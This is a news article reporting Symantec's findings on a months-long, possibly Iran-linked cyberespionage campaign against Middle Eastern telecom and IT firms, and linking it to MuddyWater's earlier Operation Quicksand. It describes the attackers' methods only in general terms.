New cyberespionage campaign discovered, possibly linked to Iran

A Symantec report reveals that telecom operators and IT service organizations across the Middle East have been targeted for months, with the threat actor appearing to be the one behind Operation Quicksand

New cyberespionage campaign discovered, possibly linked to Iran

BIGSTOCK/Copyright: Mehaniq

Telecom operators and IT service organizations across the Middle East have been targeted by possible Iran-linked malicious actors over the past six months. This, according to a new report by Symantec’s Threat Hunter Team.

The report suggests that the identity of the attackers – who have targeted Israel, Jordan, Kuwait, Saudi Arabia, the UAE, Pakistan, and also Thailand and Laos – remains unconfirmed at the moment. However, “there is some evidence to suggest a link to the Iranian Seedworm (Aka MuddWater).

According to MITRE ATT&CK, MuddyWater “is an Iranian threat group that has primarily targeted Middle Eastern nations, and also European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors.”

MuddyWater, also known by the names Earth Vetala, MERCURY, TEMP.Zagros and Statin Kitten, first appeared on the scene in 2018. Its main goal is believed to be espionage. 

“After breaching a targeted network, the attackers typically attempt to steal credentials and move laterally across the network,” says the Symantec report.

“In some cases, the attackers may be using compromised organizations as stepping stones to additional victims. Furthermore, some targets may have been compromised solely to perform supply-chain-type attacks on other organizations.”

The attackers tend to deploy web shells onto Exchange Servers. The researchers mention one attack, from August 2021, where  the first evidence of compromise was the creation of a service to launch an unknown Windows Script File (WSF). The attackers used PowerShell to download another WSF and run it.”

Symantec’s research team discovered that two IP addresses used in this campaign have been previously linked to Seedworm activity. Yet, they write, “Seedworm is known to regularly switch its infrastructure, meaning conclusive attribution cannot be made.”

In an October 2020 report, Symantec’s Threat Hunter Team warned that Seedworm has been very active over the past few months, with attacks launched against multiple targets in the Middle East, including government organizations. Attacks were discovered against targets in Iraq, Turkey, Kuwait, the United Arab Emirates, and Georgia.

A few days prior to that report, the ClearSky Research Team reported that in September 2020 they identified a new campaign dubbed Operation Quicksand, which they attributed to Muddywater. The campaign targeted “many prominent Israeli organizations”. According to ClearSky, “MuddyWater was previously exposed as a contractor for the IRGC (Islamic Republic Guard Corps).”

ClearSky’s assessment was that the group was attempting to commit destructive attacks, while disguising them as ransomware ones. It also identified the group employed a variant of PowGoop, a fake Google Update mechanism.

You might be interested also